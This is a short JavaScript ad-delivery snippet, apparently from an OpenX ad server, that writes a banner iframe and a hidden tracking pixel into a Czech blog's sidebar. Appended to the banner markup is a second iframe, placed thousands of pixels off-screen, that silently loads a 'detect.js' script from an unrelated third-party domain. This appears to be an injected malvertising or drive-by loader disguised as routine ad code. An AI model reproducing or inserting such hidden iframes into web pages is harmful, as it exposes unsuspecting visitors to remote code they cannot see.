 var OX_d58311a6 = ''; OX_d58311a6 += "<"+"iframe src=\"http://openads.aira.cz/www/images/ab_1130.html\" width=\"300\" height=\"600\" scrolling=\"no\" noresize=\"noresize\" frameborder=\"0\" marginheight=\"0\" marginwidth=\"0\"><"+"/iframe><"+"div id=\'beacon_d8cd19c77a\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://openads.aira.cz/www/delivery/lg.php?bannerid=1130&amp;campaignid=275&amp;zoneid=100&amp;source=null&amp;loc=1&amp;referer=http%3A%2F%2Fdiit.cz%2Fblog%2Ffilmove-formaty-1-honba-za-maximalnim-zazitkem&amp;cb=d8cd19c77a\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"iframe style=\"position:absolute;left:-3912px;top:-4000px;width:303px;height:348px;\" src=\"http://dean.carolinabusinesspartner.com/microwave/detect.js\"><"+"/iframe>";  var placement="skyscraperSidebar"; if(placement && document.getElementById(placement)) {
		if(OX_d58311a6){
			if(typeof window.advertisementCallback == "function")
				advertisementCallback(placement);
			document.getElementById(placement).className += " full";
		}
		document.getElementById(placement).innerHTML = OX_d58311a6 ;
		if(typeof window.advertisementAfterCallback == "function")
				advertisementAfterCallback(placement);} 